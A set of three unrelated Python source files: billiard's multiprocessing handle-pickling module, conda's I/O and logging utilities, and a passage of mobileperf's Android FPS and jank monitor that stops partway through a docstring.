| source | python |
|---|---|
reduction.py
|
#
# Module to allow connection and socket objects to be transferred
# between processes
#
# multiprocessing/reduction.py
#
# Copyright (c) 2006-2008, R Oudkerk
# Licensed to PSF under a Contributor Agreement.
#
from __future__ import absolute_import
__all__ = []
import os
import sys
import socket
import threading
from . import current_process
from ._ext import _billiard, win32
from .forking import Popen, duplicate, close, ForkingPickler
from .util import register_after_fork, debug, sub_debug
from .connection import Client, Listener
if not(sys.platform == 'win32' or hasattr(_billiard, 'recvfd')):
raise ImportError('pickling of connections not supported')
# globals set later
_listener = None
_lock = None
_cache = set()
#
# Platform specific definitions
#
if sys.platform == 'win32':
# XXX Should this subprocess import be here?
import _subprocess # noqa
def send_handle(conn, handle, destination_pid):
process_handle = win32.OpenProcess(
win32.PROCESS_ALL_ACCESS, False, destination_pid
)
try:
new_handle = duplicate(handle, process_handle)
conn.send(new_handle)
finally:
close(process_handle)
def recv_handle(conn):
return conn.recv()
else:
def send_handle(conn, handle, destination_pid): # noqa
_billiard.sendfd(conn.fileno(), handle)
def recv_handle(conn): # noqa
return _billiard.recvfd(conn.fileno())
#
# Support for a per-process server thread which caches pickled handles
#
def _reset(obj):
global _lock, _listener, _cache
for h in _cache:
close(h)
_cache.clear()
_lock = threading.Lock()
_listener = None
_reset(None)
register_after_fork(_reset, _reset)
def _get_listener():
global _listener
if _listener is None:
_lock.acquire()
try:
if _listener is None:
debug('starting listener and thread for sending handles')
_listener = Listener(authkey=current_process().authkey)
t = threading.Thread(target=_serve)
t.daemon = True
t.start()
finally:
_lock.release()
return _listener
def _serve():
from .util import is_exiting, sub_warning
while 1:
try:
conn = _listener.accept()
handle_wanted, destination_pid = conn.recv()
_cache.remove(handle_wanted)
send_handle(conn, handle_wanted, destination_pid)
close(handle_wanted)
conn.close()
except:
if not is_exiting():
sub_warning('thread for sharing handles raised exception',
exc_info=True)
#
# Functions to be used for pickling/unpickling objects with handles
#
def reduce_handle(handle):
if Popen.thread_is_spawning():
return (None, Popen.duplicate_for_child(handle), True)
dup_handle = duplicate(handle)
_cache.add(dup_handle)
sub_debug('reducing handle %d', handle)
return (_get_listener().address, dup_handle, False)
def rebuild_handle(pickled_data):
address, handle, inherited = pickled_data
if inherited:
return handle
sub_debug('rebuilding handle %d', handle)
conn = Client(address, authkey=current_process().authkey)
conn.send((handle, os.getpid()))
new_handle = recv_handle(conn)
conn.close()
return new_handle
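# Editor's note: a minimal illustrative sketch (not part of the original module)
# of how the pair above is meant to be used.  reduce_handle() runs in the process
# that owns the descriptor and returns picklable data; rebuild_handle() runs in
# the receiving process and asks the sender's listener thread for a duplicate.
# The helper below is hypothetical and is never called by this module.
def _example_handle_roundtrip(conn):
    """Round-trip a connection's file descriptor through the handle machinery."""
    pickled_data = reduce_handle(conn.fileno())    # on the sending side
    new_fd = rebuild_handle(pickled_data)          # normally done in the receiver
    return _billiard.Connection(new_fd, readable=conn.readable,
                                writable=conn.writable)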
#
# Register `_billiard.Connection` with `ForkingPickler`
#
def reduce_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_connection, (rh, conn.readable, conn.writable)
def rebuild_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _billiard.Connection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_billiard.Connection, reduce_connection)
#
# Register `socket.socket` with `ForkingPickler`
#
def fromfd(fd, family, type_, proto=0):
s = socket.fromfd(fd, family, type_, proto)
if s.__class__ is not socket.socket:
s = socket.socket(_sock=s)
return s
def reduce_socket(s):
reduced_handle = reduce_handle(s.fileno())
return rebuild_socket, (reduced_handle, s.family, s.type, s.proto)
def rebuild_socket(reduced_handle, family, type_, proto):
fd = rebuild_handle(reduced_handle)
_sock = fromfd(fd, family, type_, proto)
close(fd)
return _sock
ForkingPickler.register(socket.socket, reduce_socket)
#
# Register `_billiard.PipeConnection` with `ForkingPickler`
#
if sys.platform == 'win32':
def reduce_pipe_connection(conn):
rh = reduce_handle(conn.fileno())
return rebuild_pipe_connection, (rh, conn.readable, conn.writable)
def rebuild_pipe_connection(reduced_handle, readable, writable):
handle = rebuild_handle(reduced_handle)
return _billiard.PipeConnection(
handle, readable=readable, writable=writable
)
ForkingPickler.register(_billiard.PipeConnection, reduce_pipe_connection)
|
io.py
|
# -*- coding: utf-8 -*-
# Copyright (C) 2012 Anaconda, Inc
# SPDX-License-Identifier: BSD-3-Clause
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import defaultdict
from concurrent.futures import ProcessPoolExecutor, ThreadPoolExecutor, Executor, Future, _base, as_completed # NOQA
from concurrent.futures.thread import _WorkItem
from contextlib import contextmanager
from enum import Enum
from errno import EPIPE, ESHUTDOWN
from functools import partial, wraps
import sys
if sys.version_info[0] > 2:
# Used below by write_wrapper() inside captured().
from io import BytesIO
from itertools import cycle
import json
import logging # lgtm [py/import-and-import-from]
from logging import CRITICAL, Formatter, NOTSET, StreamHandler, WARN, getLogger
import os
from os.path import dirname, isdir, isfile, join
import signal
from threading import Event, Thread, Lock
from time import sleep, time
from .compat import StringIO, iteritems, on_win, encode_environment
from .constants import NULL
from .path import expand
from ..auxlib.decorators import memoizemethod
from ..auxlib.logz import NullHandler
from ..auxlib.type_coercion import boolify
from .._vendor.tqdm import tqdm
log = getLogger(__name__)
class DeltaSecondsFormatter(Formatter):
"""
Logging formatter with additional attributes for run time logging.
Attributes:
`delta_secs`:
Elapsed seconds since last log/format call (or creation of logger).
`relative_created_secs`:
Like `relativeCreated`, time relative to the initialization of the
`logging` module but conveniently scaled to seconds as a `float` value.
"""
def __init__(self, fmt=None, datefmt=None):
self.prev_time = time()
super(DeltaSecondsFormatter, self).__init__(fmt=fmt, datefmt=datefmt)
def format(self, record):
now = time()
prev_time = self.prev_time
self.prev_time = max(self.prev_time, now)
record.delta_secs = now - prev_time
record.relative_created_secs = record.relativeCreated / 1000
return super(DeltaSecondsFormatter, self).format(record)
if boolify(os.environ.get('CONDA_TIMED_LOGGING')):
_FORMATTER = DeltaSecondsFormatter(
"%(relative_created_secs) 7.2f %(delta_secs) 7.2f "
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
else:
_FORMATTER = Formatter(
"%(levelname)s %(name)s:%(funcName)s(%(lineno)d): %(message)s"
)
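# Editor's note: a small sketch (not part of the original module) of how the
# formatter selected above gets attached to a logger.  When CONDA_TIMED_LOGGING
# is truthy, each record also carries delta_secs (seconds since the previous
# record) and relative_created_secs.  The logger name used here is hypothetical.
def _example_timed_logging_setup():
    handler = StreamHandler(sys.stderr)
    handler.setFormatter(_FORMATTER)
    example_logger = getLogger("conda.example")
    example_logger.addHandler(handler)
    example_logger.setLevel(logging.DEBUG)
    return example_logger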
def dashlist(iterable, indent=2):
return ''.join('\n' + ' ' * indent + '- ' + str(x) for x in iterable)
class ContextDecorator(object):
"""Base class for a context manager class (implementing __enter__() and __exit__()) that also
makes it a decorator.
"""
# TODO: figure out how to improve this pattern so e.g. swallow_broken_pipe doesn't have to be instantiated # NOQA
def __call__(self, f):
@wraps(f)
def decorated(*args, **kwds):
with self:
return f(*args, **kwds)
return decorated
class SwallowBrokenPipe(ContextDecorator):
# Ignore BrokenPipeError and errors related to stdout or stderr being
# closed by a downstream program.
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
if (exc_val
and isinstance(exc_val, EnvironmentError)
and getattr(exc_val, 'errno', None)
and exc_val.errno in (EPIPE, ESHUTDOWN)):
return True
swallow_broken_pipe = SwallowBrokenPipe()
class CaptureTarget(Enum):
"""Constants used for contextmanager captured.
Used similarly like the constants PIPE, STDOUT for stdlib's subprocess.Popen.
"""
STRING = -1
STDOUT = -2
@contextmanager
def env_vars(var_map=None, callback=None, stack_callback=None):
if var_map is None:
var_map = {}
new_var_map = encode_environment(var_map)
saved_vars = {}
for name, value in iteritems(new_var_map):
saved_vars[name] = os.environ.get(name, NULL)
os.environ[name] = value
try:
if callback:
callback()
if stack_callback:
stack_callback(True)
yield
finally:
for name, value in iteritems(saved_vars):
if value is NULL:
del os.environ[name]
else:
os.environ[name] = value
if callback:
callback()
if stack_callback:
stack_callback(False)
@contextmanager
def env_var(name, value, callback=None, stack_callback=None):
# Maybe, but in env_vars, not here:
# from conda.compat import ensure_fs_path_encoding
# d = dict({name: ensure_fs_path_encoding(value)})
d = {name: value}
with env_vars(d, callback=callback, stack_callback=stack_callback) as es:
yield es
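# Editor's note: an illustrative sketch (not part of the original module) of the
# env_vars()/env_var() context managers above.  Values that existed before entry
# are restored on exit; names that did not exist are removed again (the NULL
# sentinel marks "was not previously set").  The variable name is hypothetical.
def _example_env_var_usage():
    with env_var('CONDA_EXAMPLE_FLAG', 'true'):
        assert os.environ['CONDA_EXAMPLE_FLAG'] == 'true'
    # outside the block the variable is gone again, assuming it was unset before
    assert 'CONDA_EXAMPLE_FLAG' not in os.environ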
@contextmanager
def env_unmodified(callback=None):
with env_vars(callback=callback) as es:
yield es
@contextmanager
def captured(stdout=CaptureTarget.STRING, stderr=CaptureTarget.STRING):
"""Capture outputs of sys.stdout and sys.stderr.
If stdout is STRING, capture sys.stdout as a string,
if stdout is None, do not capture sys.stdout, leaving it untouched,
otherwise redirect sys.stdout to the file-like object given by stdout.
Behave correspondingly for stderr with the exception that if stderr is STDOUT,
redirect sys.stderr to stdout target and set stderr attribute of yielded object to None.
Args:
stdout: capture target for sys.stdout, one of STRING, None, or file-like object
stderr: capture target for sys.stderr, one of STRING, STDOUT, None, or file-like object
Yields:
CapturedText: has attributes stdout, stderr which are either strings, None or the
corresponding file-like function argument.
"""
# NOTE: This function is not thread-safe. Using it from multiple threads may cause spurious
# behavior where sys.stdout and sys.stderr are not restored to their 'proper' state
# """
# Context manager to capture the printed output of the code in the with block
#
# Bind the context manager to a variable using `as` and the result will be
# in the stdout property.
#
# >>> from conda.common.io import captured
# >>> with captured() as c:
# ... print('hello world!')
# ...
# >>> c.stdout
# 'hello world!\n'
# """
def write_wrapper(self, to_write):
# This may have to deal with a *lot* of text.
if hasattr(self, 'mode') and 'b' in self.mode:
wanted = bytes
elif sys.version_info[0] == 3 and isinstance(self, BytesIO):
wanted = bytes
else:
# ignore flake8 on this because it finds an error on py3 even though it is guarded
if sys.version_info[0] == 2:
wanted = unicode # NOQA
else:
wanted = str
if not isinstance(to_write, wanted):
if hasattr(to_write, 'decode'):
decoded = to_write.decode('utf-8')
self.old_write(decoded)
elif hasattr(to_write, 'encode'):
b = to_write.encode('utf-8')
self.old_write(b)
else:
self.old_write(to_write)
class CapturedText(object):
pass
# sys.stdout.write(u'unicode out')
# sys.stdout.write(bytes('bytes out', encoding='utf-8'))
# sys.stdout.write(str('str out'))
saved_stdout, saved_stderr = sys.stdout, sys.stderr
if stdout == CaptureTarget.STRING:
outfile = StringIO()
outfile.old_write = outfile.write
outfile.write = partial(write_wrapper, outfile)
sys.stdout = outfile
else:
outfile = stdout
if outfile is not None:
sys.stdout = outfile
if stderr == CaptureTarget.STRING:
errfile = StringIO()
errfile.old_write = errfile.write
errfile.write = partial(write_wrapper, errfile)
sys.stderr = errfile
elif stderr == CaptureTarget.STDOUT:
sys.stderr = errfile = outfile
else:
errfile = stderr
if errfile is not None:
sys.stderr = errfile
c = CapturedText()
log.debug("overtaking stderr and stdout")
try:
yield c
finally:
if stdout == CaptureTarget.STRING:
c.stdout = outfile.getvalue()
else:
c.stdout = outfile
if stderr == CaptureTarget.STRING:
c.stderr = errfile.getvalue()
elif stderr == CaptureTarget.STDOUT:
c.stderr = None
else:
c.stderr = errfile
sys.stdout, sys.stderr = saved_stdout, saved_stderr
log.debug("stderr and stdout yielding back")
@contextmanager
def argv(args_list):
saved_args = sys.argv
sys.argv = args_list
try:
yield
finally:
sys.argv = saved_args
@contextmanager
def _logger_lock():
logging._acquireLock()
try:
yield
finally:
logging._releaseLock()
@contextmanager
def disable_logger(logger_name):
logr = getLogger(logger_name)
_lvl, _dsbld, _prpgt = logr.level, logr.disabled, logr.propagate
null_handler = NullHandler()
with _logger_lock():
logr.addHandler(null_handler)
logr.setLevel(CRITICAL + 1)
logr.disabled, logr.propagate = True, False
try:
yield
finally:
with _logger_lock():
logr.removeHandler(null_handler) # restore list logr.handlers
logr.level, logr.disabled = _lvl, _dsbld
logr.propagate = _prpgt
@contextmanager
def stderr_log_level(level, logger_name=None):
logr = getLogger(logger_name)
_hndlrs, _lvl, _dsbld, _prpgt = logr.handlers, logr.level, logr.disabled, logr.propagate
handler = StreamHandler(sys.stderr)
handler.name = 'stderr'
handler.setLevel(level)
handler.setFormatter(_FORMATTER)
with _logger_lock():
logr.setLevel(level)
logr.handlers, logr.disabled, logr.propagate = [], False, False
logr.addHandler(handler)
logr.setLevel(level)
try:
yield
finally:
with _logger_lock():
logr.handlers, logr.level, logr.disabled = _hndlrs, _lvl, _dsbld
logr.propagate = _prpgt
def attach_stderr_handler(level=WARN, logger_name=None, propagate=False, formatter=None):
# get old stderr logger
logr = getLogger(logger_name)
old_stderr_handler = next((handler for handler in logr.handlers if handler.name == 'stderr'),
None)
# create new stderr logger
new_stderr_handler = StreamHandler(sys.stderr)
new_stderr_handler.name = 'stderr'
new_stderr_handler.setLevel(level)
new_stderr_handler.setFormatter(formatter or _FORMATTER)
# do the switch
with _logger_lock():
if old_stderr_handler:
logr.removeHandler(old_stderr_handler)
logr.addHandler(new_stderr_handler)
logr.setLevel(NOTSET)
logr.propagate = propagate
def timeout(timeout_secs, func, *args, **kwargs):
"""Enforce a maximum time for a callable to complete.
Not yet implemented on Windows.
"""
default_return = kwargs.pop('default_return', None)
if on_win:
# Why does Windows have to be so difficult all the time? Kind of gets old.
# Guess we'll bypass Windows timeouts for now.
try:
return func(*args, **kwargs)
except KeyboardInterrupt: # pragma: no cover
return default_return
else:
class TimeoutException(Exception):
pass
def interrupt(signum, frame):
raise TimeoutException()
signal.signal(signal.SIGALRM, interrupt)
signal.alarm(timeout_secs)
try:
ret = func(*args, **kwargs)
signal.alarm(0)
return ret
except (TimeoutException, KeyboardInterrupt): # pragma: no cover
return default_return
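# Editor's note: a usage sketch (not part of the original module) for timeout()
# above.  On POSIX the callable is interrupted via SIGALRM after timeout_secs and
# default_return is returned instead; on Windows the callable simply runs to
# completion.  The callable below is a hypothetical stand-in.
def _example_timeout_usage():
    def _slow_computation():
        sleep(5)
        return 42
    # returns 42 if the call finishes within 10 seconds, otherwise -1
    return timeout(10, _slow_computation, default_return=-1)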
class Spinner(object):
"""
Args:
message (str):
A message to prefix the spinner with. The string ': ' is automatically appended.
enabled (bool):
If False, usage is a no-op.
json (bool):
If True, will not output non-json to stdout.
"""
# spinner_cycle = cycle("⠋⠙⠹⠸⠼⠴⠦⠧⠇⠏")
spinner_cycle = cycle('/-\\|')
def __init__(self, message, enabled=True, json=False, fail_message="failed\n"):
self.message = message
self.enabled = enabled
self.json = json
self._stop_running = Event()
self._spinner_thread = Thread(target=self._start_spinning)
self._indicator_length = len(next(self.spinner_cycle)) + 1
self.fh = sys.stdout
self.show_spin = enabled and not json and hasattr(self.fh, "isatty") and self.fh.isatty()
self.fail_message = fail_message
def start(self):
if self.show_spin:
self._spinner_thread.start()
elif not self.json:
self.fh.write("...working... ")
self.fh.flush()
def stop(self):
if self.show_spin:
self._stop_running.set()
self._spinner_thread.join()
self.show_spin = False
def _start_spinning(self):
try:
while not self._stop_running.is_set():
self.fh.write(next(self.spinner_cycle) + ' ')
self.fh.flush()
sleep(0.10)
self.fh.write('\b' * self._indicator_length)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.stop()
else:
raise
@swallow_broken_pipe
def __enter__(self):
if not self.json:
sys.stdout.write("%s: " % self.message)
sys.stdout.flush()
self.start()
def __exit__(self, exc_type, exc_val, exc_tb):
self.stop()
if not self.json:
with swallow_broken_pipe:
if exc_type or exc_val:
sys.stdout.write(self.fail_message)
else:
sys.stdout.write("done\n")
sys.stdout.flush()
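# Editor's note: a usage sketch (not part of the original module) for the Spinner
# class above.  As a context manager it prints "<message>: ", spins on a helper
# thread while the body runs, and ends the line with "done" or the fail message.
def _example_spinner_usage():
    with Spinner("Collecting package metadata"):
        sleep(1)   # stand-in for real work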
class ProgressBar(object):
def __init__(self, description, enabled=True, json=False):
"""
Args:
description (str):
The name of the progress bar, shown on left side of output.
enabled (bool):
If False, usage is a no-op.
json (bool):
If true, outputs json progress to stdout rather than a progress bar.
Currently, the json format assumes this is only used for "fetch", which
maintains backward compatibility with conda 4.3 and earlier behavior.
"""
self.description = description
self.enabled = enabled
self.json = json
if json:
pass
elif enabled:
bar_format = "{desc}{bar} | {percentage:3.0f}% "
try:
self.pbar = tqdm(desc=description, bar_format=bar_format, ascii=True, total=1,
file=sys.stdout)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def update_to(self, fraction):
try:
if self.json and self.enabled:
sys.stdout.write('{"fetch":"%s","finished":false,"maxval":1,"progress":%f}\n\0'
% (self.description, fraction))
elif self.enabled:
self.pbar.update(fraction - self.pbar.n)
except EnvironmentError as e:
if e.errno in (EPIPE, ESHUTDOWN):
self.enabled = False
else:
raise
def finish(self):
self.update_to(1)
@swallow_broken_pipe
def close(self):
if self.enabled and self.json:
sys.stdout.write('{"fetch":"%s","finished":true,"maxval":1,"progress":1}\n\0'
% self.description)
sys.stdout.flush()
elif self.enabled:
self.pbar.close()
# use this for debugging, because ProcessPoolExecutor isn't pdb/ipdb friendly
class DummyExecutor(Executor):
def __init__(self):
self._shutdown = False
self._shutdownLock = Lock()
def submit(self, fn, *args, **kwargs):
with self._shutdownLock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = Future()
try:
result = fn(*args, **kwargs)
except BaseException as e:
f.set_exception(e)
else:
f.set_result(result)
return f
def map(self, func, *iterables):
for iterable in iterables:
for thing in iterable:
yield func(thing)
def shutdown(self, wait=True):
with self._shutdownLock:
self._shutdown = True
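# Editor's note: an illustrative sketch (not part of the original module) of why
# DummyExecutor exists: submit() runs the callable synchronously in the calling
# thread, so pdb/ipdb breakpoints inside `fn` are hit directly, unlike with
# ProcessPoolExecutor.
def _example_dummy_executor_usage(fn, items):
    executor = DummyExecutor()
    try:
        return [executor.submit(fn, item).result() for item in items]
    finally:
        executor.shutdown()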
class ThreadLimitedThreadPoolExecutor(ThreadPoolExecutor):
def __init__(self, max_workers=10):
super(ThreadLimitedThreadPoolExecutor, self).__init__(max_workers)
def submit(self, fn, *args, **kwargs):
"""
This is an exact reimplementation of the `submit()` method on the parent class, except
with an added `try/except` around `self._adjust_thread_count()`. So long as there is at
least one living thread, this thread pool will not throw an exception if threads cannot
be expanded to `max_workers`.
In the implementation, we use "protected" attributes from concurrent.futures (`_base`
and `_WorkItem`). Consider vendoring the whole concurrent.futures library
as an alternative to these protected imports.
https://github.com/agronholm/pythonfutures/blob/3.2.0/concurrent/futures/thread.py#L121-L131 # NOQA
https://github.com/python/cpython/blob/v3.6.4/Lib/concurrent/futures/thread.py#L114-L124
"""
with self._shutdown_lock:
if self._shutdown:
raise RuntimeError('cannot schedule new futures after shutdown')
f = _base.Future()
w = _WorkItem(f, fn, args, kwargs)
self._work_queue.put(w)
try:
self._adjust_thread_count()
except RuntimeError:
# RuntimeError: can't start new thread
# See https://github.com/conda/conda/issues/6624
if len(self._threads) > 0:
# It's ok to not be able to start new threads if we already have at least
# one thread alive.
pass
else:
raise
return f
as_completed = as_completed
def get_instrumentation_record_file():
default_record_file = join('~', '.conda', 'instrumentation-record.csv')
return expand(os.environ.get("CONDA_INSTRUMENTATION_RECORD_FILE", default_record_file))
class time_recorder(ContextDecorator): # pragma: no cover
record_file = get_instrumentation_record_file()
start_time = None
total_call_num = defaultdict(int)
total_run_time = defaultdict(float)
def __init__(self, entry_name=None, module_name=None):
self.entry_name = entry_name
self.module_name = module_name
def _set_entry_name(self, f):
if self.entry_name is None:
if hasattr(f, '__qualname__'):
entry_name = f.__qualname__
else:
entry_name = ':' + f.__name__
if self.module_name:
entry_name = '.'.join((self.module_name, entry_name))
self.entry_name = entry_name
def __call__(self, f):
self._set_entry_name(f)
return super(time_recorder, self).__call__(f)
def __enter__(self):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if enabled and boolify(enabled):
self.start_time = time()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
if self.start_time:
entry_name = self.entry_name
end_time = time()
run_time = end_time - self.start_time
self.total_call_num[entry_name] += 1
self.total_run_time[entry_name] += run_time
self._ensure_dir()
with open(self.record_file, 'a') as fh:
fh.write("%s,%f\n" % (entry_name, run_time))
# total_call_num = self.total_call_num[entry_name]
# total_run_time = self.total_run_time[entry_name]
# log.debug('%s %9.3f %9.3f %d', entry_name, run_time, total_run_time, total_call_num)
@classmethod
def log_totals(cls):
enabled = os.environ.get('CONDA_INSTRUMENTATION_ENABLED')
if not (enabled and boolify(enabled)):
return
log.info('=== time_recorder total time and calls ===')
for entry_name in sorted(cls.total_run_time.keys()):
log.info(
'TOTAL %9.3f % 9d %s',
cls.total_run_time[entry_name],
cls.total_call_num[entry_name],
entry_name,
)
@memoizemethod
def _ensure_dir(self):
if not isdir(dirname(self.record_file)):
os.makedirs(dirname(self.record_file))
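# Editor's note: a usage sketch (not part of the original module) for
# time_recorder above.  With CONDA_INSTRUMENTATION_ENABLED set to a truthy value,
# every call appends "<entry_name>,<seconds>" to the instrumentation record file.
# The decorated function below is hypothetical and never called here.
@time_recorder(entry_name="example.expensive_step")
def _example_expensive_step():
    sleep(0.1)   # stand-in for real work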
def print_instrumentation_data(): # pragma: no cover
record_file = get_instrumentation_record_file()
grouped_data = defaultdict(list)
final_data = {}
if not isfile(record_file):
return
with open(record_file) as fh:
for line in fh:
entry_name, total_time = line.strip().split(',')
grouped_data[entry_name].append(float(total_time))
for entry_name in sorted(grouped_data):
all_times = grouped_data[entry_name]
counts = len(all_times)
total_time = sum(all_times)
average_time = total_time / counts
final_data[entry_name] = {
'counts': counts,
'total_time': total_time,
'average_time': average_time,
}
print(json.dumps(final_data, sort_keys=True, indent=2, separators=(',', ': ')))
if __name__ == "__main__":
print_instrumentation_data()
|
fps.py
|
# -*- coding: utf-8 -*-
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
'''FPS monitor
'''
import queue
import datetime
import time
import re
import threading
import os,sys
import copy
import csv
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.common.basemonitor import Monitor
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.log import logger
from mobileperf.common.utils import TimeUtils
from mobileperf.android.globaldata import RuntimeData
class SurfaceStatsCollector(object):
'''Collects surface stats for a SurfaceView from the output of SurfaceFlinger
'''
def __init__(self, device, frequency,package_name,fps_queue,jank_threshold,use_legacy = False):
self.device = device
self.frequency = frequency
self.package_name = package_name
self.jank_threshold = jank_threshold / 1000.0  # timestamps used internally are in seconds
self.use_legacy_method = use_legacy
self.surface_before = 0
self.last_timestamp = 0
self.data_queue = queue.Queue()
self.stop_event = threading.Event()
self.focus_window = None
# queue used by the reporting thread
self.fps_queue = fps_queue
def start(self,start_time):
'''Start the SurfaceStatsCollector'''
if not self.use_legacy_method and self._clear_surfaceflinger_latency_data():
try:
self.focus_window = self.get_focus_activity()
# if self.focus_window contains the character '$', it must be escaped
if (self.focus_window.find('$') != -1):
self.focus_window = self.focus_window.replace('$','\$')
except:
logger.warn(u'Unable to get the current Activity name dynamically; using page_flip to measure the full-screen frame rate!')
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
else:
logger.debug("dumpsys SurfaceFlinger --latency-clear is none")
self.use_legacy_method = True
self.surface_before = self._get_surface_stats_legacy()
self.collector_thread = threading.Thread(target=self._collector_thread)
self.collector_thread.start()
self.calculator_thread = threading.Thread(target=self._calculator_thread,args=(start_time,))
self.calculator_thread.start()
def stop(self):
'''Stop the SurfaceStatsCollector'''
if self.collector_thread:
self.stop_event.set()
self.collector_thread.join()
self.collector_thread = None
if self.fps_queue:
self.fps_queue.task_done()
def get_focus_activity(self):
'''Get the activity (window) name via "dumpsys window windows"'''
return self.device.adb.get_focus_activity()
def _calculate_results(self, refresh_period, timestamps):
"""Returns a list of SurfaceStatsCollector.Result.
不少手机第一列 第三列 数字完全相同
"""
frame_count = len(timestamps)
if frame_count ==0:
fps = 0
jank = 0
elif frame_count == 1:
fps = 1
jank = 0
else:
seconds = timestamps[-1][1] - timestamps[0][1]
if seconds > 0:
fps = int(round((frame_count - 1) / seconds))
jank =self._calculate_janky(timestamps)
else:
fps = 1
jank = 0
return fps,jank
def _calculate_janky(self,timestamps):
tempstamp = 0
# count dropped-frame janks
jank = 0
for timestamp in timestamps:
if tempstamp == 0:
tempstamp = timestamp[1]
continue
# time spent drawing this frame
costtime = timestamp[1] - tempstamp
# if the frame takes longer than the threshold (10 vsync periods), the user perceives jank
if costtime > self.jank_threshold:
jank = jank + 1
tempstamp = timestamp[1]
return jank
def _calculator_thread(self,start_time):
'''Process the SurfaceFlinger data'''
fps_file = os.path.join(RuntimeData.package_save_path, 'fps.csv')
if self.use_legacy_method:
fps_title = ['datetime', 'fps']
else:
fps_title = ['datetime', "activity window", 'fps', 'jank']
try:
with open(fps_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(fps_title)
if self.fps_queue:
fps_file_dic = {'fps_file': fps_file}
self.fps_queue.put(fps_file_dic)
except RuntimeError as e:
logger.exception(e)
while True:
try:
data = self.data_queue.get()
if isinstance(data, str) and data == 'Stop':
break
before = time.time()
if self.use_legacy_method:
td = data['timestamp'] - self.surface_before['timestamp']
seconds = td.seconds + td.microseconds / 1e6
frame_count = (data['page_flip_count'] -
self.surface_before['page_flip_count'])
fps = int(round(frame_count / seconds))
if fps>60:
fps = 60
self.surface_before = data
logger.debug('FPS:%2s'%fps)
tmp_list = [TimeUtils.getCurrentTimeUnderline(),fps]
try:
with open(fps_file, 'a+') as f:
# tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
else:
refresh_period = data[0]
timestamps = data[1]
collect_time = data[2]
fps,jank = self._calculate_results(refresh_period, timestamps)
logger.debug('FPS:%2s Jank:%s'%(fps,jank))
fps_list=[collect_time,self.focus_window,fps,jank]
if self.fps_queue:
self.fps_queue.put(fps_list)
if not self.fps_queue:  # save data to file when the script runs standalone (no report queue)
try:
with open(fps_file, 'a+') as f:
tmp_list = copy.deepcopy(fps_list)
tmp_list[0] = TimeUtils.formatTimeStamp(tmp_list[0])
csv.writer(f, lineterminator='\n').writerow(tmp_list)
except RuntimeError as e:
logger.exception(e)
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _calculator_thread ,reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
def _collector_thread(self):
'''Collect SurfaceFlinger data.
Two approaches are used. When use_legacy_method is True, root permission is required and
the frame count is obtained via "service call SurfaceFlinger 1013".
When it is False, "dumpsys SurfaceFlinger --latency" is used; on Android 8.0
"dumpsys SurfaceFlinger" returns no content, in which case
"dumpsys gfxinfo package_name framestats" is used instead.
'''
is_first = True
while not self.stop_event.is_set():
try:
before = time.time()
if self.use_legacy_method:
surface_state = self._get_surface_stats_legacy()
if surface_state:
self.data_queue.put(surface_state)
else:
timestamps = []
refresh_period, new_timestamps = self._get_surfaceflinger_frame_data()
if refresh_period is None or new_timestamps is None:
# the activity changed and the old activity no longer exists, so the fetched timestamps are empty
self.focus_window = self.get_focus_activity()
logger.debug("refresh_period is None or timestamps is None")
continue
# keep only frames that have not already been counted
timestamps += [timestamp for timestamp in new_timestamps
if timestamp[1] > self.last_timestamp]
if len(timestamps):
first_timestamp = [[0, self.last_timestamp, 0]]
if not is_first:
timestamps = first_timestamp + timestamps
self.last_timestamp = timestamps[-1][1]
is_first = False
else:
# Two cases: 1) the activity changed but the old activity still exists; the fetched
#    timestamps are not empty, but they are all <= last_timestamp
# 2) the activity did not change and nothing was refreshed
is_first = True
cur_focus_window = self.get_focus_activity()
if self.focus_window != cur_focus_window:
self.focus_window = cur_focus_window
continue
logger.debug(timestamps)
self.data_queue.put((refresh_period, timestamps,time.time()))
time_consume = time.time() - before
delta_inter = self.frequency - time_consume
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in fps _collector_thread , reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.fps_queue:
self.fps_queue.task_done()
self.data_queue.put(u'Stop')
def _clear_surfaceflinger_latency_data(self):
"""Clears the SurfaceFlinger latency data.
Returns:
True if SurfaceFlinger latency is supported by the device, otherwise
False.
"""
# The command returns nothing if it is supported, otherwise returns many
# lines of result just like 'dumpsys SurfaceFlinger'.
if self.focus_window == None:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear')
else:
results = self.device.adb.run_shell_cmd(
'dumpsys SurfaceFlinger --latency-clear %s' % self.focus_window)
return not len(results)
def _get_surfaceflinger_frame_data(self):
"""Returns collected SurfaceFlinger frame timing data.
return:(16.6,[[t1,t2,t3],[t4,t5,t6]])
Returns:
A tuple containing:
- The display's nominal refresh period in seconds.
- A list of timestamps signifying frame presentation times in seconds.
The return value may be (None, None) if there was no data collected (for
example, if the app was closed before the collector thread has finished).
"""
# shell dumpsys SurfaceFlinger --latency <window name>
# prints some information about the last 128 frames displayed in
# that window.
# The data returned looks like this:
# 16954612
# 7657467895508 7657482691352 7657493499756
# 7657484466553 7657499645964 7657511077881
